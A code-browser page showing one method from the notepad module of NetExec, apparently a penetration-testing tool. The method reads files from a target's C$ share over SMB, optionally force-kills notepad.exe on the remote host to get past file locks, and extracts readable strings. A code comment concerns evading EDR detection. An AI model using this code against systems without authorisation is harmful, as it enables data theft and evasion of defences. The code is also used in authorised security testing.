MCPcopy
hub / github.com/Pennyw0rth/NetExec / read_and_decode_file

Method read_and_decode_file

nxc/modules/notepad.py:92–122  ·  view source on GitHub ↗
(self, connection, context, file_path, user)

Source from the content-addressed store, hash-verified

90 return string not in common_garbage
91
92 def read_and_decode_file(self, connection, context, file_path, user):
93 buf = BytesIO()
94 try:
95 connection.conn.getFile("C$", file_path, buf.write)
96 except Exception as e:
97 if "STATUS_SHARING_VIOLATION" in str(e): # It means notepad.exe is open on target.
98 if self.kill:
99 try:
100 context.log.debug(f"Trying to kill notepad.exe process for {user} user.")
101 # To Do: Kill process with RPC, connection.execute can be detect by EDRs and module wont work. Or copy the target bin files without trigger the EDRs
102 connection.execute("taskkill /IM notepad.exe /F") # If notepad.exe open by user, needs to kill that process for reading files.
103 time.sleep(1) # Sleep 1 sec for finding and reading processing
104 context.log.debug(f"Notepad process was successfully killed for {user}")
105 connection.conn.getFile("C$", file_path, buf.write)
106 except Exception as e:
107 context.log.debug(f"Alternative method failed: {e}")
108 else:
109 context.log.fail("Notepad.exe is open on target. If want to kill process, add kill option true. (-o KILL=True)")
110 return []
111 else:
112 # If it's a different error, just skip this file
113 context.log.debug(f"Error accessing {file_path}: {e}")
114
115 buf.seek(0)
116 binary_data = buf.read()
117
118 # Return only the meaningful strings
119 return [
120 string for _, string in self.extract_strings(binary_data)
121 if self.is_meaningful_content(string)
122 ]
123
124 def on_admin_login(self, context, connection):
125 self.context = context

Callers 1

on_admin_loginMethod · 0.95

Calls 6

extract_stringsMethod · 0.95
is_meaningful_contentMethod · 0.95
failMethod · 0.80
seekMethod · 0.80
executeMethod · 0.45
readMethod · 0.45

Tested by

no test coverage detected